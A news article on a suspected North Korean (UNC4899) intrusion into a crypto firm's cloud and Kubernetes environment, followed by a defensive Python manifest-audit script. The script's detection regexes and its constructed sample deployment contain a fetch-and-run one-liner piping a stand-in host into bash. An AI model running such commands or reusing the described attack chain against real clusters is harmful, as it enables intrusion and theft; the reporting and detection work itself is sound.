North Korean Cyber Group Suspected in Major Cloud Attack on Crypto Firm
A sophisticated cyberattack targeting a cryptocurrency organization in 2025 has been linked to a North Korean hacking group known as UNC4899, according to new threat intelligence findings.
Security analysts believe the attackers stole millions of dollars in cryptocurrency after infiltrating the company’s cloud infrastructure. The group has previously been tracked by multiple security vendors under different names, including Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.
Researchers say the operation combined several advanced techniques, including social engineering, device-to-device file transfers, and abuse of legitimate cloud services to hide malicious activity.
Attack Began With Developer Social Engineering
According to findings highlighted in Google Cloud’s 2026 Cloud Threat Horizons report, the attack began when a developer was tricked into downloading a malicious archive file.
The attackers presented the file as part of a collaboration on an open-source project. After downloading it to a personal computer, the developer later transferred the archive to their corporate workstation using AirDrop, unknowingly bringing the malware into the company environment.
While exploring the files using an AI-powered development environment, the victim executed hidden Python code embedded inside the archive. This code launched a malicious binary disguised as the Kubernetes command-line tool, allowing the attackers to establish a backdoor connection to the machine.
Hackers Pivoted From Workstation to Cloud Infrastructure
Once the attackers gained access to the developer’s corporate system, they used the compromised machine to move deeper into the organization’s cloud environment.
The malware connected to an attacker-controlled server and enabled remote access to the infected workstation. Using stolen credentials and active authentication sessions, the attackers began exploring the company’s Google Cloud resources.
Their initial actions involved reconnaissance, gathering information about various services, cloud projects, and infrastructure components.
Eventually, the attackers located a bastion host, a system used to manage secure connections to internal infrastructure. By altering its multi-factor authentication settings, they were able to access it and continue probing the network, including examining Kubernetes pods within the environment.

Attackers Used “Living-Off-the-Cloud” Techniques
Instead of deploying obvious malware across the cloud environment, the hackers relied on a tactic known as living-off-the-cloud (LotC). This approach involves abusing legitimate cloud tools and workflows to avoid detection.
The attackers modified Kubernetes deployment configurations so that every newly created pod automatically executed a malicious bash command. This command downloaded a backdoor, ensuring the attackers could maintain long-term access.
Further investigation revealed additional actions taken during the intrusion:
- Kubernetes resources linked to the company’s CI/CD platform were altered to expose service account tokens in system logs.
- The attackers captured a high-privilege CI/CD token, allowing them to expand their access and move laterally across the infrastructure.
- Using the stolen token, they accessed a privileged infrastructure pod and escaped the container environment, giving them deeper control over the system.
- A backdoor was deployed to maintain persistent access to the compromised cloud environment.
Database Credentials Stolen From Misconfigured Workload
After securing deeper access, the attackers focused on systems responsible for managing customer data.
They identified a workload that handled user accounts, security settings, and cryptocurrency wallet information. Within this environment, they discovered static database credentials that had been stored insecurely in environment variables.
Using these credentials, the attackers connected to the company’s production database through the Cloud SQL Auth Proxy. They then executed SQL commands to manipulate user accounts.
The modifications included resetting passwords and updating multi-factor authentication settings for several high-value accounts.
Millions in Cryptocurrency Stolen
With control over these accounts, the attackers were able to access cryptocurrency wallets and initiate withdrawals.
The breach ultimately resulted in the theft of millions of dollars' worth of digital assets, highlighting the growing risks facing cryptocurrency organizations operating in cloud environments.

Key Security Lessons From the Attack
Security experts say the incident exposes several critical weaknesses that organizations must address.
These include:
- Risks created by peer-to-peer file transfers between personal and corporate devices
- Use of privileged container environments that allow attackers to escape container isolation
- Poor handling of sensitive secrets such as database credentials within cloud workloads
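The Kubernetes weaknesses named above (pod templates rewritten to download-and-execute a backdoor, privileged containers, and static database credentials in environment variables) can be screened for in a manifest audit. The script below is an added example, not code from the report or the affected organization; the deployment it inspects is constructed for illustration, and the regexes are a starting heuristic rather than an exhaustive detector.

```python
import re

# Shell one-liner that fetches remote content and pipes or chains it into a shell.
DOWNLOAD_RE = re.compile(
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\b(curl|wget)\b.*&&.*\b(sh|bash|chmod)\b")
# Env var names that usually carry a secret; a literal "value" here is a static credential.
SECRET_NAME_RE = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_KEY|DATABASE_URL|DB_URL)", re.I)


def audit_pod_spec(spec):
    """Return (container, issue) findings for one pod spec in Kubernetes JSON shape."""
    findings = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name = c.get("name", "?")
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        if DOWNLOAD_RE.search(cmdline):
            findings.append((name, "download-and-execute in command/args"))
        # postStart hooks are another place a pod template can be made to run a fetcher.
        hook = c.get("lifecycle", {}).get("postStart", {}).get("exec", {}).get("command", [])
        if DOWNLOAD_RE.search(" ".join(hook)):
            findings.append((name, "download-and-execute in postStart hook"))
        if c.get("securityContext", {}).get("privileged"):
            findings.append((name, "privileged container"))
        for env in c.get("env", []):
            # valueFrom a Secret is acceptable; an inline literal under a secret-like name is not.
            if SECRET_NAME_RE.search(env.get("name", "")) and "value" in env:
                findings.append((name, f"static secret in env var {env['name']}"))
    return findings


def audit_deployment(deployment):
    """Audit the pod template of a Deployment-shaped dict."""
    return audit_pod_spec(deployment["spec"]["template"]["spec"])


# Constructed sample deployment exhibiting all three weaknesses (not from the incident).
SAMPLE_DEPLOYMENT = {
    "kind": "Deployment",
    "metadata": {"name": "wallet-api"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "api",
        "command": ["/bin/bash", "-c", "curl -s http://example.invalid/x | bash; exec /app/server"],
        "env": [{"name": "DB_PASSWORD", "value": "hunter2"},
                {"name": "DB_USER", "valueFrom": {"secretKeyRef": {"name": "db", "key": "user"}}}],
        "securityContext": {"privileged": True},
    }]}}},
}

if __name__ == "__main__":
    for container, issue in audit_deployment(SAMPLE_DEPLOYMENT):
        print(f"{container}: {issue}")
```

Feed it the output of `kubectl get deployments -A -o json` (iterating over `items`) to run the same checks against a live cluster.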
Experts recommend organizations adopt a defense-in-depth approach to reduce the impact of similar attacks.
Recommended security measures include:
- Enforcing phishing-resistant multi-factor authentication
- Implementing context-aware access controls
- Restricting peer-to-peer file transfers such as AirDrop and Bluetooth on corporate devices
- Ensuring only trusted container images are deployed
- Monitoring for unusual container activity
- Isolating compromised nodes from external connections
- Implementing secure secrets management practices
Security teams are also encouraged to strengthen endpoint protection and prevent unmanaged external devices from interacting with corporate systems.